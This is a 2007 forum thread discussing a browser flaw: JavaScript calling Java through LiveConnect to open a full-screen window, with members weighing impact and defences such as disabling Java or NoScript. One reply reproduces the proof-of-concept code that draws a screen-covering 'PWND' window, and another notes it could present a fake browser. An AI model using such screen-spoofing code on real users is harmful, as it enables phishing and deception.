Author Topic: Full screen Java popup  (Read 5050 times)

0 Members and 1 Guest are viewing this topic.

Offline chuck

  • Full Member
  • ***
  • Posts: 335
  • Canadian Biathlete
    • View Profile
    • Chucks Blog
Full screen Java popup
« on: August 08, 2007, 02:31:21 pm »
http://hackademix.net/2007/08/07/java-evil-popups

Kind of scary, but I can still see my menu bar on a mac, so I know what's real and what's not. Also, a simple cmd+w closes it, so much for not being able to close it!
Chucks Blog
JavaOp2 Plugins

Quote
Error, keyboard not connected. Press F1 to continue.

Offline Newby

  • x86
  • Hero Member
  • *****
  • Posts: 10877
  • Thrash!
    • View Profile
Re: Full screen Java popup
« Reply #1 on: August 08, 2007, 02:48:18 pm »
... and if you disable java altogether, there's no problem! :D
- Newby
http://www.x86labs.org

Quote
[17:32:45] * xar sets mode: -oooooooooo algorithm ban chris cipher newby stdio TehUser tnarongi|away vursed warz
[17:32:54] * xar sets mode: +o newby
[17:32:58] <xar> new rule
[17:33:02] <xar> me and newby rule all

I'd bet that you're currently bloated like a water ballon on a hot summer's day.

That analogy doesn't even make sense.  Why would a water balloon be especially bloated on a hot summer's day? For your sake, I hope there wasn't too much logic testing on your LSAT. 

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: Full screen Java popup
« Reply #2 on: August 08, 2007, 02:52:31 pm »
Noscript for the win. :)

Offline Hdx

  • The Hdx!
  • Full Member
  • ***
  • Posts: 311
  • <3 Java/Cpp/VB/QB
    • View Profile
Re: Full screen Java popup
« Reply #3 on: August 08, 2007, 10:12:28 pm »
I was able to ahve ti go truly fullscreen only when I
1) Unlocked my tray
2) closed all 'docked' windows (Trillian, wigets, etc..)
So..? Not that impressive.
~Hdx
http://img140.exs.cx/img140/6720/hdxnew6lb.gif
09/08/05 - Clan SBs @ USEast
 [19:59:04.000] <DeadHelp> We don't like customers.
 [19:59:05.922] <DeadHelp> They're assholes
 [19:59:08.094] <DeadHelp> And they're never right.

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: Full screen Java popup
« Reply #4 on: August 08, 2007, 10:18:42 pm »
A lot of people don't have docked programs, so it is rather impressive. And even if it covers your browser only, if you use this to present the user with a fake browser, you can potentially do a lot of damage.

Offline Joe

  • B&
  • x86
  • Hero Member
  • *****
  • Posts: 10319
  • In Soviet Russia, text read you!
    • View Profile
    • Github
Re: Full screen Java popup
« Reply #5 on: August 15, 2007, 08:40:53 am »
In case anyone's wondering, I tried this on my dual monitor set up. When I ran the JavaScript test (I'm on Firefox, so, Gecko-based) the PWND window showed up on my default monitor, but the taskbar still showed. My secondary monitor, which I (luckily?) was browsing on at the time, was unaffected.

Apparently I'm in the safe zone. And congrats to iago on 12,000 posts.

EDIT -
Code: [Select]
function popup() {
  if(typeof(java) == "undefined") {
    window.onload = function() {
      document.getElementById("nojava").innerHTML =
         "Your browser doesn't support LiveConnect or you've got Java disabled!";
    };
    return;
  }
  var w = new java.awt.Window(new java.awt.Frame());
  var label = new java.awt.Label("PWND");
  label.setFont(new java.awt.Font("Serif", java.awt.Font.BOLD, 80));
  label.setAlignment(label.CENTER);
  label.setForeground(java.awt.Color.white);
  w.setBackground(java.awt.Color.black);
  w.setLayout(new java.awt.BorderLayout());
  w.add(label, java.awt.BorderLayout.CENTER);
  w.setLocation(0, 0);
  var d = java.awt.Toolkit.getDefaultToolkit().getScreenSize();
  d.height += 80;
  w.setSize(d);
  w.setVisible(true);
}

And I'm sort of laughing a bit now that I realize this can be exploited in Firefox and not Internet Exploder. Wait, what?!?!
« Last Edit: August 15, 2007, 08:43:05 am by Joe[x86/64] »
I'd personally do as Joe suggests

You might be right about that, Joe.


Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: Full screen Java popup
« Reply #6 on: August 15, 2007, 08:50:41 am »
This is reportedly exploitable on all major browsers (IE, FF, Opera).

Offline Joe

  • B&
  • x86
  • Hero Member
  • *****
  • Posts: 10319
  • In Soviet Russia, text read you!
    • View Profile
    • Github
Re: Full screen Java popup
« Reply #7 on: August 16, 2007, 02:57:01 am »
Eh, it's much easier in Firefox, since in IE you need to download the whole applet and whatnot. It's still as easy to get sucked in, but Firefox facilitates it being done easier for the programmer.
I'd personally do as Joe suggests

You might be right about that, Joe.


Offline Chavo

  • x86
  • Hero Member
  • *****
  • Posts: 2219
  • no u
    • View Profile
    • Chavoland
Re: Full screen Java popup
« Reply #8 on: August 16, 2007, 11:37:56 am »
Noscript for the win. :)
Noscript is not worth the huge pain in the ass that it is.  This should be a fairly easy to fix exploit.

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: Full screen Java popup
« Reply #9 on: August 16, 2007, 12:43:59 pm »
Noscript for the win. :)
Noscript is not worth the huge pain in the ass that it is.  This should be a fairly easy to fix exploit.
I don't consider it a pain at all, I have it installed on all my computers. Most good sides (including the SMF forum) can operate 100% without JavaScript.

Offline Hitmen

  • B&
  • x86
  • Hero Member
  • *****
  • Posts: 1913
    • View Profile
Re: Full screen Java popup
« Reply #10 on: August 16, 2007, 12:51:55 pm »
I think the internet isn't worth the huge pain in the ass that it is without noscript :|
Quote
(22:15:39) Newby: it hurts to swallow